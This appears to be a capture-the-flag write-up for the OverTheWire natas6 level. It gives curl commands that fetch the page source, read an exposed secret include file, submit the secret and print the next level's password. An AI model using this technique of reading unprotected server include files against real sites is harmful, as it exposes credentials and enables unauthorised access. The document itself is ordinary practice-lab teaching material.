curl -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned http://natas6.natas.labs.overthewire.org

Body:

<body>
<h1>natas6</h1>
<div id="content">
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

There is a POST form asking for a secret, plus a View sourcecode link. The real logic is not on the main page, so pull index-source.html with the same basic auth.

A plain curl dump is still full HTML (<br>, tags, and whatever your terminal does for color), so it looked messy on my side. Piping through w3m renders it as readable text in the terminal:

curl -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned http://natas6.natas.labs.overthewire.org/index-source.html | w3m -T text/html

Relevant PHP:

<?
include "includes/secret.inc";

if (array_key_exists("submit", $_POST)) {
    if ($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

The comparison uses $secret from includes/secret.inc. That file is not PHP-executed when fetched as a static URL, so you can read it directly:

curl -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Submit that value as secret on the form. With curl, send POST data with -d (and keep -u for natas6):

curl -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned \
  -d "secret=FOEIUWGHFEEUHOFUOIU&submit=" \
  http://natas6.natas.labs.overthewire.org/

Body:

<body>
<h1>natas6</h1>
<div id="content">
Access granted. The password for natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The server compares your input to the included secret, matching strings grant access and print the next password.

Password for natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS